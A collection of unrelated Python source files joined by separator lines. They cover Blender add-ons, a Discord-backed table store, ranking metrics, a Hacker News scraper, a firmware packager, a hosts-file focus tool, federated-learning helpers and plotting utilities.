bpy.context.window_manager.popup_menu(draw, title = title, icon = icon)
def menu_func_export(self, context):
self.layout.operator(ExportARENAScene.bl_idname, text="Export to ARENA")
def register():
bpy.utils.register_class(ExportARENAScene)
bpy.types.TOPBAR_MT_file_export.append(menu_func_export)
def unregister():
bpy.utils.unregister_class(ExportARENAScene)
bpy.types.TOPBAR_MT_file_export.remove(menu_func_export)
if __name__ == "__main__":
register()
# test call
bpy.ops.export_arena.scene('INVOKE_DEFAULT')
|
import numpy as np
print('test run')
a = np.asarray([1,2,3])
print(str(a))
|
#!usr/bin/env python3.7
#-*-coding:utf-8-*-
import discord
from src.discord.database.exceptions import *
from src.discord.database.dataformat import *
class Table:
def __init__(self,db,name):
self.db = db
self.name = name
if not Table.exists(db, name):
raise TableDoesNotExist(db, name)
self.channel = discord.utils.get(db.category.text_channels, name="{}-{}".format(db.name,name))
@staticmethod
def exists(db,name):
chan = discord.utils.get(db.category.text_channels, name="{}-{}".format(db.name,name))
return chan is not None
@classmethod
async def create(cl,db,name):
if cl.exists(db, name):
raise TableAlreadyExist(db, name)
await db.category.create_text_channel("{}-{}".format(db.name,name), reason="creating table in database")
db.logger.info("Creating table %s in database %s",name,db.name)
return cl(db, name)
async def fetch(self):
data = []
self.db.logger.info("Fetching table %s from database %s ...",self.name,self.db.name)
async for message in self.channel.history(limit=None):
data.append(DataFormat.parse(message.content))
self.db.logger.info("Fetching table %s from database %s finished",self.name,self.db.name)
return data
async def delete(self):
await self.channel.delete(reason="delete table")
self.db.logger.info("Removing table %s from database %s",self.name,self.db.name)
async def add_row(self,*data):
data = DataFormat(*data)
await data.send(self.channel)
self.db.logger.info("Added row to table %s from database %s",self.name,self.db.name)
async def delete_row(self,identifier):
#assume the identifier is always in the first column
async for message in self.channel.history(limit=None):
data = DataFormat.parse(message.content)
if data[0] == identifier:
await message.delete()
self.db.logger.info("Removed row from table %s from database %s",self.name,self.db.name)
async def update_row(self,identifier,*data):
#assume the identifier is always in the first column
data = DataFormat(identifier,*data)
async for message in self.channel.history(limit=None):
datadb = DataFormat.parse(message.content)
if datadb[0] == identifier:
await message.edit(content=str(data))
self.db.logger.info("Updated row from table %s from database %s",self.name,self.db.name)
|
# coding=utf-8
# !/usr/bin/python3.6 ## Please use python 3.6
"""
__synopsis__ : Matching Networks for Extreme Classification.
__description__ : Metrics (Precision@k and NDCG@k) for Matching Networks for Extreme Classification.
__project__ : MNXC
__author__ : Vishwak, Samujjwal Ghosh
__version__ : "0.1"
__date__ : "08-11-2018"
__copyright__ : "Copyright (c) 2019"
__license__ : This source code is licensed under the MIT-style license found in the LICENSE file in the root
directory of this source tree.
__classes__ : Metrics
__variables__ :
__methods__ : precision_at_k, dcg_score_at_k, ndcg_score_at_k
"""
import numpy as np
import torch
from logger.logger import logger
seed_val = 0
# random.seed(seed_val)
# np.random.seed(seed_val)
# torch.manual_seed(seed_val)
# torch.cuda.manual_seed_all(seed=seed_val)
def precision_at_k(actuals,predictions,k=5,pos_label=1):
"""
Function to evaluate the precision @ k for a given
ground truth vector and a list of predictions (between 0 and 1).
Args:
actuals : np.array consisting of multi-hot encoding of label vector
predictions : np.array consisting of predictive probabilities for every label.
k : Value of k. Default: 5
pos_label : Value to consider as positive. Default: 1
Returns:
precision @ k for a given ground truth - prediction pair.
"""
assert len(actuals) == len(predictions),"P@k: Length mismatch: len(actuals) [{}] == [{}] len(predictions)"\
.format(len(actuals),len(predictions))
## Converting to Numpy as it has supported funcions.
if torch.is_tensor(actuals):
logger.info("'actuals' is of [{}] type. Converting to Numpy.".format(type(actuals)))
actuals = actuals.numpy()
logger.debug(actuals)
if torch.is_tensor(predictions):
logger.info("'predictions' is of [{}] type. Converting to Numpy.".format(type(predictions)))
predictions = predictions.data.numpy()
logger.debug(predictions)
n_pos_vals = (actuals == pos_label).sum()
desc_order = np.argsort(predictions,-k) # [::-1] reverses array
matches = np.take(actuals,desc_order[:,:k]) # taking the top indices
relevant_preds = (matches == pos_label).sum()
return relevant_preds / min(n_pos_vals,k)
def dcg_score_at_k(actuals,predictions,k=5,pos_label=1):
"""
Function to evaluate the Discounted Cumulative Gain @ k for a given
ground truth vector and a list of predictions (between 0 and 1).
Args:
actuals : np.array consisting of multi-hot encoding of label
vector
predictions : np.array consisting of predictive probabilities for
every label.
k : Value of k. Default: 5
pos_label : Value to consider as positive. Default: 1
Returns:
DCG @ k for a given ground truth - prediction pair.
"""
assert len(actuals) == len(predictions),"DCG@k: Length mismatch: len(actuals) [{}] == [{}] len(predictions)"\
.format(len(actuals),len(predictions))
desc_order = np.argsort(predictions)[::-1] # ::-1 reverses array
actuals = np.take(actuals,desc_order[:k]) # the top indices
gains = 2 ** actuals - 1
discounts = np.log2(np.arange(1,len(actuals) + 1) + 1)
return np.sum(gains / discounts)
def ndcg_score_at_k(actuals,predictions,k=5,pos_label=1):
"""
Function to evaluate the Discounted Cumulative Gain @ k for a given
ground truth vector and a list of predictions (between 0 and 1).
Args:
actuals : np.array consisting of multi-hot encoding of label
vector
predictions : np.array consisting of predictive probabilities for
every label.
k : Value of k. Default: 5
pos_label : Value to consider as positive. Default: 1
Returns:
NDCG @ k for a given ground truth - prediction pair.
"""
dcg_at_k = dcg_score_at_k(actuals,predictions,k,pos_label)
best_dcg_at_k = dcg_score_at_k(actuals,actuals,k,pos_label)
return dcg_at_k / best_dcg_at_k
class Metrics:
""" Initializes an Metrics object. """
def __init__(self,cuda_available=None,use_cuda: bool = False) -> None:
if cuda_available is None:
self.cuda_available = torch.cuda.is_available()
else:
self.cuda_available = cuda_available
self.use_cuda = use_cuda
@staticmethod
def precision_k_hot(actuals: torch.Tensor,predictions: torch.Tensor,k: int = 1,pos_label: int = 1) -> float:
"""
Calculates precision of actuals multi-hot vectors and predictions probabilities of shape: (batch_size, Number of samples, Number of categories).
:param actuals: 3D torch.tensor consisting of multi-hot encoding of label vector of shape: (batch_size, Number of samples, Number of categories)
:param predictions: torch.tensor consisting of predictive probabilities for every label: (batch_size, Number of samples, Number of categories)
:param k: Value of k. Default: 1
:param pos_label: Value to consider as positive in Multi-hot vector. Default: 1
:return: Precision @ k for a given ground truth - prediction pair.for a batch of samples.
"""
## Top k probabilities
preds_indices = torch.argsort(predictions,dim=2,descending=True)
preds_desc = preds_indices[:,:,:k]
# com_labels = [] # batch_size, Number of samples
precision_batch = 0
for i in np.arange(predictions.shape[0]): # (batch_size, Number of samples, Number of categories)
precision_samples = 0
for j in np.arange(predictions.shape[1]):
precision_elm = 0
for l in np.arange(preds_desc.shape[2]):
if actuals[i,j,preds_desc[i,j,l].item()] == pos_label: # Checking if top index positions are 1.
precision_elm += 1
precision_samples += precision_elm / preds_desc.shape[2]
precision_batch += precision_samples / predictions.shape[1]
precision = precision_batch / predictions.shape[0]
return precision # , com_labels
if __name__ == '__main__':
cls_count = 3
multi_hot = np.random.randint(2,size=(2,2,cls_count)) # Generates integers till 2-1, i.e. [0 or 1]
logger.debug(multi_hot)
indices = [[[0],[0,2]],[[1],[0,2]]] # Generates integers till [cls_count]
logger.debug(indices)
# indices = np.random.randint(cls_count, size=(1, 2, cls_count)) # Generates integers till [cls_count]
proba = np.random.rand(2,2,cls_count)
logger.debug(proba)
test_metrics = Metrics()
proba_t = torch.from_numpy(proba)
multi_hot_t = torch.from_numpy(multi_hot)
precision,com_labels = test_metrics.precision_k_hot(multi_hot_t,proba_t,k=2)
logger.debug(precision)
logger.debug(com_labels)
# logger.debug(proba)
# logger.debug(proba.shape)
# logger.debug(multi_hot)
# logger.debug(multi_hot.shape)
# np_val = precision_at_k(multi_hot, proba, k=1)
# logger.debug(np_val.shape)
# logger.debug(np_val)
# logger.debug(type(np_val))
#
# logger.debug(a_t)
# logger.debug(a_t.shape)
# logger.debug(b_t)
# logger.debug(b_t.shape)
#
# torch_val = precision_at_k(b_t, a_t)
# logger.debug(torch_val.shape)
# logger.debug(torch_val)
# logger.debug(type(torch_val))
|
import requests
from bs4 import BeautifulSoup
from pprint import pprint
import json
response = requests.get('https://news.ycombinator.com/news')
soup = BeautifulSoup(response.text, 'html.parser')
links = soup.select('.storylink')
subtext = soup.select('.subtext')
def sort_stories_by_votes(hmlist):
sorted_data = sorted(hmlist, key=lambda x: x['Votes'], reverse=True)
print(type(sorted_data), len(sorted_data))
return to_json(sorted_data)
def create_custom_hm(links, subtext):
hm = []
for idx, item in enumerate(links):
title = links[idx].getText()
href = links[idx].get('href', None)
vote = subtext[idx].select('.score')
if len(vote):
points = int(vote[0].getText().replace(' points', ''))
if points > 100:
hm.append({'title': title, 'links': href, 'Votes': points})
return sort_stories_by_votes(hm)
def to_json(sorted_data):
with open("data.json", 'w') as file:
json.dump(sorted_data, file)
pprint(create_custom_hm(links, subtext))
|
from mars_profiling.report.presentation.flavours.widget.collapse import WidgetCollapse
from mars_profiling.report.presentation.flavours.widget.container import (
WidgetContainer,
)
from mars_profiling.report.presentation.flavours.widget.duplicate import (
WidgetDuplicate,
)
from mars_profiling.report.presentation.flavours.widget.frequency_table import (
WidgetFrequencyTable,
)
from mars_profiling.report.presentation.flavours.widget.frequency_table_small import (
WidgetFrequencyTableSmall,
)
from mars_profiling.report.presentation.flavours.widget.html import WidgetHTML
from mars_profiling.report.presentation.flavours.widget.image import WidgetImage
from mars_profiling.report.presentation.flavours.widget.root import WidgetRoot
from mars_profiling.report.presentation.flavours.widget.sample import WidgetSample
from mars_profiling.report.presentation.flavours.widget.table import WidgetTable
from mars_profiling.report.presentation.flavours.widget.toggle_button import (
WidgetToggleButton,
)
from mars_profiling.report.presentation.flavours.widget.variable import WidgetVariable
from mars_profiling.report.presentation.flavours.widget.variable_info import (
WidgetVariableInfo,
)
from mars_profiling.report.presentation.flavours.widget.warnings import WidgetWarnings
|
import bpy
from bpy.types import (
Curve,
)
from mathutils import (geometry, Vector)
import numpy
from . import grid
from . import bezier
import importlib
grid = importlib.reload(grid)
bezier = importlib.reload(bezier)
def is_valid_curve(curve):
if curve.dimensions != '2D' or len(curve.splines) != 1:
return False
spline = curve.splines[0]
if len(spline.bezier_points) < 2:
return False
points = spline.bezier_points
return points[len(points)-1].co.x - points[0].co.x > 0
def to_3d(point):
return Vector((point.x, 0, point.y))
class Border:
def __init__(self, cubics = None):
self.cubics = [] if cubics is None else cubics
@staticmethod
def from_curve(curve, flip=False):
border = Border()
points = curve.splines[0].bezier_points
for p0, p1 in zip(points[:-1], points[1:]):
border.cubics.append(bezier.Cubic(p0.co.xy, p0.handle_right.xy, p1.handle_left.xy, p1.co.xy))
if flip:
border.__reverse()
for cubic in border.cubics:
cubic.scale((0,), (-1,))
translation = -border.cubics[0].p
for cubic in border.cubics:
cubic.translate(translation)
return border
@property
def is_flat(self):
ref = self.cubics[0].p.y
return all(all(abs(point.y - ref) < 0.0001 for point in cubic.points) for cubic in self.cubics)
@property
def size(self):
return self.cubics[-1].q.copy()
@property
def length(self):
return self.size.x
@property
def grid_length(self):
return grid.to_grid_length(self.length)
@property
def height(self):
return self.size.y
@property
def grid_height(self):
return grid.to_grid_length(self.height)
def __reverse(self):
for cubic in self.cubics:
cubic.reverse()
self.cubics.reverse()
def flip(self):
raise 'DEPRECATED'
translation = self.cubics[-1].q.x
for cubic in self.cubics:
for point in cubic.points:
point.x = -point.x + translation
cubic.reverse()
self.cubics.reverse()
def sample(self, grid_subdivisions, precision, epsilon=0.0001):
cubics = bezier.subdivide(self.cubics, precision)
points = []
step = grid.length / grid_subdivisions
x = 0
last_cubic_index = 0
length = self.length
while x + epsilon < length:
for cubic_index, cubic in enumerate(cubics[last_cubic_index:]):
if cubic[0].x <= x and x < cubic[3].x:
last_cubic_index = cubic_index
y = cubic[0].y
if x != cubic[0].x:
y = cubic[0].y + (cubic[3].y - cubic[0].y) / (cubic[3].x - cubic[0].x) * (x - cubic[0].x)
points.append(Vector((x, y)))
break
x += step
points.append(self.cubics[-1][3].xy)
return points
def to_curve(self, name='Curve'):
curve = bpy.data.curves.new(name, type='CURVE')
curve.dimensions = '3D'
spline = curve.splines.new('BEZIER')
points = spline.bezier_points
points[0].co = to_3d(self.cubics[0].p)
points[0].handle_right = to_3d(self.cubics[0].r)
v = points[0].handle_right - points[0].co
points[0].handle_left = points[0].co - v
for i in range(len(self.cubics)-1):
points.add(1)
point = points[-1]
point.handle_left = to_3d(self.cubics[i].l)
point.co = to_3d(self.cubics[i].q)
point.handle_right = to_3d(self.cubics[i+1].r)
points.add(1)
points[-1].co = to_3d(self.cubics[-1].q)
points[-1].handle_left = to_3d(self.cubics[-1].l)
v = points[-1].handle_left - points[-1].co
points[-1].handle_right = points[-1].co - v
return curve
def resized(self, new_height, keep_tangents=True):
diff = new_height - self.size[1]
length = self.length
cubics = []
for cubic_index, cubic in enumerate(self.cubics):
dp = cubic.p.x / length * diff
dr = cubic.r.x / length * diff
dl = cubic.l.x / length * diff
dq = cubic.q.x / length * diff
if keep_tangents and cubic_index == 0:
dr = dp
if keep_tangents and cubic_index+1 == len(self.cubics):
dl = dq
cubics.append(bezier.Cubic(
cubic.p + Vector((0, dp)),
cubic.r + Vector((0, dr)),
cubic.l + Vector((0, dl)),
cubic.q + Vector((0, dq))
))
return Border(cubics)
|
#!/user/bin/python
# -*- coding: utf-8 -*-
# 1. 准备 bootloader.bin
# 2. 编译输出 rt-thread.bin
# 3. 使用 OTA 打包工具(ota packager),设置为不加密、不压缩方式,固件分区名称为 app,填入版本号,点击开始打包,将 rt-thread.bin 打包为 rt-thread.rbl
# 4. 将 bootloader.bin、rt-thread.rbl 拷贝到 AllBinPackager.py 目录下
# 5. 配置 config.json,填写文件名、分区偏移地址、分区大小(十六进制)
# 6. 在 AllBinPackager.py 所在目录下打开命令行,输入 `python AllBinPackager.py` 完成 all.bin 打包
import sys
import json
# 解决乱码问题
reload(sys)
sys.setdefaultencoding( "utf-8" )
def load_json_to_dic(file):
load_dict = {}
with open(file, 'r') as load_f:
try:
load_dict = json.load(load_f)
except Exception as ex:
load_dict = {}
raise Exception, "load json file error!"
return load_dict
class allbin():
boot_file = None
boot_raw_data = None
boot_rbl_data = None
app_file = None
app_raw_data = None
app_rbl_data = None
def file_handler(self, in_file, out_file, part_size = 0, offset_addr = 0):
self.raw_data = None
self.rbl_data = None
file_seek = 0
if (in_file[-4:] == ".bin"):
print("=== bin")
with open(in_file, 'rb') as f:
f.seek(0, 0)
self.raw_data = f.read()
elif (in_file[-4:] == ".rbl"):
print("--- rbl")
file_seek = part_size - 96
with open(in_file, 'rb') as f:
f.seek(0, 0)
self.rbl_data = f.read(96)
self.raw_data = f.read()
with open(out_file, 'wb') as f:
if (self.raw_data != None):
f.write(self.raw_data)
if (self.rbl_data != None):
f.seek(file_seek, 0)
f.write(self.rbl_data)
return
def allbin_packager(self, cfg_file = "config.json"):
try:
config_dict = load_json_to_dic(cfg_file)
if len(config_dict) == 0:
return -1
if not (config_dict.has_key("bootloader") and config_dict.has_key("app")):
return -1
self.boot_file = config_dict["bootloader"]["file"]
self.app_file = config_dict["app"]["file"]
print(self.boot_file[-4:])
print(self.app_file[-4:])
print("boot")
self.boot_part_size = int(config_dict["bootloader"]["partition_size"], 16)
self.boot_offset_addr = int(config_dict["bootloader"]["partition_offset_addr"], 16)
self.file_handler(self.boot_file, "test_boot_rbl.bin", self.boot_part_size, self.boot_offset_addr)
print("app")
self.app_part_size = int(config_dict["app"]["partition_size"], 16)
self.app_offset_addr = int(config_dict["app"]["partition_offset_addr"], 16)
self.file_handler(self.app_file, "test_app_rbl.bin", self.app_part_size, self.app_offset_addr)
with open("all.bin", 'wb') as allbin_f:
with open("test_boot_rbl.bin", 'rb') as boot_f:
allbin_f.write(boot_f.read())
with open("test_app_rbl.bin", 'rb') as app_f:
allbin_f.seek(self.app_offset_addr, 0)
allbin_f.write(app_f.read())
except Exception as ex:
raise Exception, "all bin packager failed!"
return 0
if __name__ == "__main__":
print('RT-Thread all.bin packager v1.0.0')
all_bin_o = allbin()
all_bin_o.allbin_packager()
print('all.bin packager success!')
|
"""concentration/settings.py
Defines how the basic concentration settings get loaded.
"""
import os
import sys
from enum import Enum
OS = Enum('OS', 'linux mac windows')
HOSTS_FILE = "/etc/hosts"
REDIRECT_TO = "127.0.0.1"
START_TOKEN = "## START DISTRACTORS ##"
END_TOKEN = "## END DISTRACTORS ##"
SUB_DOMAINS = ('www', 'news')
DISTRACTORS = {'ycombinator.com', 'slashdot.com', 'facebook.com', 'reddit.com', 'gawker.com', 'theverge.com',
'techcrunch.com', 'thenextweb.com', 'wired.com', 'gizmodo.com', 'slickdeals.net',
'mashable.com', 'digitaltrends.com', 'techradar.com', 'twitter.com', 'tumblr.com',
'technorati.com', 'digg.com', 'buzzfeed.com', 'twitter.com', 'youtube.com', 'netflix.com',
'iwastesomuchtime.com', 'pinterest.com', 'ebay.com', 'thepointsguy.com', 'imgur.com', 'woot.com',
'flyertalk.com', 'instagram.com', 'medium.com', 'meetup.com', 'distrowatch.com',
'arstechnica.com', 'phoronix.com', 'arstechnica.com', 'failblog.com', 'redfin.com', 'realtor.com',
'zillow.com', 'trulia.com', 'cnn.com', 'fox.com', 'realclearpolitics.com', 'yelp.com',
'opentable.com', 'slashdot.org', 'xkcd.com', 'cnet.com', 'tomshardware.com', 'engadget.com', 'zdnet.com',
'techrepublic.com', 'gizmag.com', 'anandtech.com', 'imore.com', 'gsmarena.com ', 'geek.com',
'firstpost.com', 'wearables.com', 'stripgenerator.com', 'fmylife.com', 'liveplasma.com', 'cracked.com',
'befunky.com', 'pcworld.com', 'typepad.com', 'pogo.com', 'omegle.com', 'lifehacker.com', 'answerbag.com',
'cheezburger.com', 'fark.com', 'popurls.com', 'sho.com', 'hulu.com', 'myparentsjoinedfacebook.com',
'homestarrunner.com', 'petsinclothes.com', 'freerice.com', 'everypoet.com', 'mono-1.com',
'mcsweeneys.net', 'postsecret.com', 'textsfromlastnight.com', 'awkwardfamilyphotos.com', 'myspace.com',
'lunchtimers.com', 'twitterfall.com', 'break.com', 'passiveaggressivenotes.com', 'sciencemag.org',
'bbc.com', 'notalwaysright.com'}
for config_file_path in ('/etc/concentration.distractors', os.path.expanduser('~/.concentration.distractors')):
if os.path.isfile(config_file_path):
with open(config_file_path) as config_file:
DISTRACTORS.update(config_file.read().splitlines())
for config_file_path in ('/etc/concentration.safe', os.path.expanduser('~/.concentration.safe')):
if os.path.isfile(config_file_path):
with open(config_file_path) as config_file:
DISTRACTORS.difference_update(config_file.read().splitlines()) # Remove all white listed domains
DISTRACTORS.discard('')
PLATFORM = OS.linux
for platform in (("linux", OS.linux), ("darwin", OS.mac), ("win32", OS.windows)):
if platform[0] in sys.platform:
PLATFORM = platform[1]
RESTART_NETWORK = {OS.linux: [["/etc/init.d/networking", "restart"],
["/etc/init.d/nscd", "restart"],
["/etc/rc.d/nscd", "restart"],
["/etc/rc.d/init.d/nscd", "restart"]],
OS.mac: [["dscacheutil", "-flushcache"]],
OS.windows: [["ipconfig", "/flushdns"]]}[PLATFORM]
if PLATFORM is OS.windows:
HOSTS_FILE = "/Windows/System32/drivers/etc/hosts"
|
""" Contains example functions for handling training """
import tensorflow as tf
import tf_encrypted as tfe
### Example model_fns ###
def default_model_fn(data_owner):
"""Runs a single training step!"""
x, y = next(data_owner.dataset)
with tf.name_scope("gradient_computation"):
with tf.GradientTape() as tape:
preds = data_owner.model(x)
loss = tf.reduce_mean(data_owner.loss(y, preds, from_logits=True))
grads = tape.gradient(loss, data_owner.model.trainable_variables)
return grads
def reptile_model_fn(data_owner, iterations=3,
grad_fn=default_model_fn, **kwargs):
"""
This corresponds to the Reptile variant that computes k steps of SGD.
When paired with the secure_aggregation aggregator_fn, this model_fn
corresponds to using g_k as the outer gradient update. See the Reptile
paper for more: https://arxiv.org/abs/1803.02999
"""
for _ in range(iterations):
grads_k = grad_fn(data_owner, **kwargs)
data_owner.optimizer.apply_gradients(
zip(grads_k, data_owner.model.trainable_variables),
)
return [var.read_value() for var in data_owner.model.trainable_variables]
### Example aggregator_fns ###
def secure_mean(collected_inputs):
""" securely calculates the mean of the collected_inputs """
with tf.name_scope('secure_mean'):
aggr_inputs = [
tfe.add_n(inputs) / len(inputs)
for inputs in collected_inputs
]
# Reveal aggregated values & cast to native tf.float32
aggr_inputs = [tf.cast(inp.reveal().to_native(), tf.float32)
for inp in aggr_inputs]
return aggr_inputs
def secure_reptile(collected_inputs, model):
aggr_weights = secure_mean(collected_inputs)
weights_deltas = [
weight - update for (weight, update) in zip(
model.trainable_variables, aggr_weights,
)
]
return weights_deltas
### Example evaluator_fns ###
def evaluate_classifier(model_owner):
"""Runs a validation step!"""
x, y = next(model_owner.evaluation_dataset)
with tf.name_scope('validate'):
predictions = model_owner.model(x)
loss = tf.reduce_mean(model_owner.loss(y, predictions, from_logits=True))
return loss
|
#!/usr/bin/env python
#
# Searches through the whole source tree and validates all
# documentation files against our own XSD in docs/xsd.
#
import sys,os
import SConsDoc
if __name__ == "__main__":
if len(sys.argv)>1:
if SConsDoc.validate_all_xml((sys.argv[1],)):
print("OK")
else:
print("Validation failed! Please correct the errors above and try again.")
else:
if SConsDoc.validate_all_xml(['src',
os.path.join('doc','design'),
os.path.join('doc','developer'),
os.path.join('doc','man'),
os.path.join('doc','python10'),
os.path.join('doc','reference'),
os.path.join('doc','user')
]):
print("OK")
else:
print("Validation failed! Please correct the errors above and try again.")
sys.exit(1)
|
"""This module contains the general information for Error ManagedObject."""
from ...imcmo import ManagedObject
from ...imccoremeta import ImcVersion, MoPropertyMeta, MoMeta
from ...imcmeta import VersionMeta
class ErrorConsts():
pass
class Error(ManagedObject):
"""This is Error class."""
consts = ErrorConsts()
naming_props = set([])
mo_meta = MoMeta("Error", "error", "", VersionMeta.Version151f, "OutputOnly", 0x1, [], [""], [], [], [None])
prop_meta = {
"cookie": MoPropertyMeta("cookie", "cookie", "string", VersionMeta.Version151f, MoPropertyMeta.READ_ONLY, None, None, None, None, [], []),
"error_code": MoPropertyMeta("error_code", "errorCode", "string", VersionMeta.Version151f, MoPropertyMeta.READ_ONLY, None, None, None, None, [], []),
"error_descr": MoPropertyMeta("error_descr", "errorDescr", "string", VersionMeta.Version151f, MoPropertyMeta.READ_ONLY, None, None, None, None, [], []),
"invocation_result": MoPropertyMeta("invocation_result", "invocationResult", "string", VersionMeta.Version151f, MoPropertyMeta.READ_ONLY, None, None, None, None, [], []),
"response": MoPropertyMeta("response", "response", "string", VersionMeta.Version151f, MoPropertyMeta.READ_ONLY, None, None, None, None, ["No", "Yes", "false", "no", "true", "yes"], []),
}
prop_map = {
"cookie": "cookie",
"errorCode": "error_code",
"errorDescr": "error_descr",
"invocationResult": "invocation_result",
"response": "response",
}
def __init__(self, parent_mo_or_dn, **kwargs):
self._dirty_mask = 0
self.cookie = None
self.error_code = None
self.error_descr = None
self.invocation_result = None
self.response = None
ManagedObject.__init__(self, "Error", parent_mo_or_dn, **kwargs)
|
# -*- coding: utf-8 -*-
from __future__ import absolute_import
import os
from psd_tools import PSDImage
from psd_tools.constants import TaggedBlock
from psd_tools.decoder.actions import Descriptor
from psd_tools.decoder.tagged_blocks import ArtboardData
from .utils import decode_psd, DATA_PATH
from PIL import Image
def test_advanced_blending():
decoded = decode_psd('advanced-blending.psd')
layer_records = decoded.layer_and_mask_data.layers.layer_records
tagged_blocks = dict(layer_records[1].tagged_blocks)
assert not tagged_blocks.get(TaggedBlock.BLEND_CLIPPING_ELEMENTS)
assert tagged_blocks.get(TaggedBlock.BLEND_INTERIOR_ELEMENTS)
tagged_blocks = dict(layer_records[3].tagged_blocks)
assert isinstance(tagged_blocks.get(TaggedBlock.ARTBOARD_DATA1),
ArtboardData)
def test_blend_and_clipping():
psd = PSDImage(decode_psd('blend-and-clipping.psd'))
for layer in psd.layers:
assert isinstance(layer.as_PIL(), Image.Image)
|
from . import audio_io
from . import constants
from . import files
from scipy import signal
import json
import numpy as np
import os
ERROR = 'fp.getframerate() != constants.FRAME_RATE: 48000'
def get_framerate_error_files():
for f in sorted(files.with_suffix(constants.METADATA_DIR, '.json')):
if json.load(open(f)).get('error') == ERROR:
yield constants.source(os.path.basename(f)[:-5])
def resample_file(filename):
if True:
original = filename
filename = filename + '.48KHz'
else:
original = filename + '.48KHz'
os.rename(filename, original)
fp, frames = audio_io.read_frames_and_fp(original)
assert fp.getframerate() == 48000
samples = audio_io.from_frames(frames, fp.getnchannels())
resampled = np.stack([signal.resample_poly(s, 160, 147) for s in samples])
audio_io.write(filename, resampled)
print('Resampled to', filename)
if __name__ == '__main__':
# resample_file(list(get_framerate_error_files())[
for f in get_framerate_error_files():
print(f)
|
import matplotlib
from matplotlib import pyplot as plt
from matplotlib import gridspec
import palettable
#CMAP1 = palettable.cartocolors.sequential.Teal_7.mpl_colormap
#CMAP2 = palettable.cartocolors.sequential.Teal_7.mpl_colormap
#COLORS = palettable.cartocolors.sequential.Teal_4_r.mpl_colors
TEXTWIDTH = 7.1014 # inches
CMAP1 = palettable.cmocean.sequential.Ice_20_r.mpl_colormap
CMAP2 = palettable.cmocean.sequential.Ice_20.mpl_colormap
COLORS = palettable.cmocean.sequential.Ice_6_r.mpl_colors
COLOR_FULL = COLORS[4] # "#B3004A"
COLOR_MASS = COLORS[3] # "#4CBFAC"
COLOR_ALIGN = COLORS[2] # "#5B4CFF"
COLOR_FIX = COLORS[1] # "#B7B7B7"
COLOR_BKG = "0.7" # "#B7B7B7"
def setup():
matplotlib.rcParams.update({'text.usetex': True, 'font.size': 10, 'font.family': 'serif'})
params= {'text.latex.preamble' : [r'\usepackage{amsmath}', r'\usepackage{amssymb}']}
plt.rcParams.update(params)
def figure(cbar=False, height=TEXTWIDTH*0.4, large_margin=0.18, mid_margin=0.14, small_margin=0.05, cbar_sep=0.03, cbar_width=0.04):
if cbar:
width = height * (1. + cbar_sep + cbar_width + large_margin - small_margin)
top = small_margin
bottom = mid_margin
left = large_margin
right = large_margin + cbar_width + cbar_sep
cleft = 1. - (large_margin + cbar_width) * height / width
cbottom = bottom
cwidth = cbar_width * height / width
cheight = 1. - top - bottom
fig = plt.figure(figsize=(width, height))
ax = plt.gca()
plt.subplots_adjust(
left=left * height / width,
right=1. - right * height / width,
bottom=bottom,
top=1. - top,
wspace=0.,
hspace=0.,
)
cax = fig.add_axes([cleft, cbottom, cwidth, cheight])
plt.sca(ax)
return fig, (ax, cax)
else:
width = height
left = large_margin
right = small_margin
top = small_margin
bottom = mid_margin
fig = plt.figure(figsize=(width, height))
ax = plt.gca()
plt.subplots_adjust(
left=left,
right=1. - right,
bottom=bottom,
top=1. - top,
wspace=0.,
hspace=0.,
)
return fig, ax
def grid(nx=4, ny=2, height=6., n_caxes=0, large_margin=0.02, small_margin=0.02, sep=0.02, cbar_width=0.03):
# Geometry (in multiples of height)
left = large_margin
right = small_margin
top = small_margin
bottom = large_margin
panel_size = (1. - top - bottom - (ny - 1)*sep)/ny
# Absolute width
width = height*(left + nx*panel_size+ (nx-1)*sep + right)
# wspace and hspace are complicated beasts
avg_width_abs = (height*panel_size * nx * ny + n_caxes * cbar_width * height) / (nx * ny + n_caxes)
avg_height_abs = height*panel_size
wspace = sep * height / avg_width_abs
hspace = sep * height / avg_height_abs
# Set up figure
fig = plt.figure(figsize=(width, height))
plt.subplots_adjust(
left=left * height / width,
right=1. - right * height / width,
bottom=bottom,
top=1. - top,
wspace=wspace,
hspace=hspace,
)
# Colorbar axes in last panel
caxes = []
if n_caxes > 0:
ax = plt.subplot(ny, nx, nx*ny)
ax.axis("off")
pos = ax.get_position()
cax_total_width=pos.width / n_caxes
cbar_width_ = cbar_width * height / width
for i in range(n_caxes):
cax = fig.add_axes([pos.x0 + i * cax_total_width, pos.y0, cbar_width_, pos.height])
cax.yaxis.set_ticks_position('right')
caxes.append(cax)
return fig, caxes
def grid_width(nx=4, ny=2, width=TEXTWIDTH, n_caxes=0, large_margin=0.025, small_margin=0.025, sep=0.025, cbar_width=0.04):
left = large_margin
right = small_margin
top = small_margin
bottom = large_margin
panel_size = (1. - top - bottom - (ny - 1) * sep) / ny
height = width / (left + nx * panel_size + (nx - 1) * sep + right)
return grid(nx, ny, height, n_caxes, large_margin, small_margin, sep, cbar_width)
def grid2(nx=4, ny=2, height=6., large_margin=0.14, small_margin=0.03, sep=0.03, cbar_width=0.06):
# Geometry
left = large_margin
right = large_margin
top = small_margin
bottom = large_margin
panel_size = (1. - top - bottom - (ny - 1)*sep)/ny
width = height*(left + nx*panel_size + cbar_width + nx*sep + right)
# wspace and hspace are complicated beasts
avg_width_abs = (height*panel_size * nx * ny + ny * cbar_width * height) / (nx * ny + ny)
avg_height_abs = height*panel_size
wspace = sep * height / avg_width_abs
hspace = sep * height / avg_height_abs
# Set up figure
fig = plt.figure(figsize=(width, height))
gs = gridspec.GridSpec(ny, nx + 1, width_ratios=[1.]*nx + [cbar_width], height_ratios=[1.] * ny)
plt.subplots_adjust(
left=left * height / width,
right=1. - right * height / width,
bottom=bottom,
top=1. - top,
wspace=wspace,
hspace=hspace,
)
return fig, gs
def grid2_width(nx=4, ny=2, width=TEXTWIDTH, large_margin=0.14, small_margin=0.03, sep=0.03, cbar_width=0.06):
left = large_margin
right = large_margin
top = small_margin
bottom = large_margin
panel_size = (1. - top - bottom - (ny - 1)*sep)/ny
height = width / (left + nx*panel_size + cbar_width + nx*sep + right)
return grid2(nx, ny, height, large_margin, small_margin, sep, cbar_width)
def two_figures(height=TEXTWIDTH*0.4, large_margin=0.18, small_margin=0.05, sep=0.21,):
# Geometry (in multiples of height)
left = large_margin
right = small_margin
top = small_margin
bottom = large_margin
panel_size = 1. - top - bottom
# Absolute width
width = height*(left + 2*panel_size+ sep + right)
# wspace and hspace are complicated beasts
avg_width_abs = height*panel_size
avg_height_abs = height*panel_size
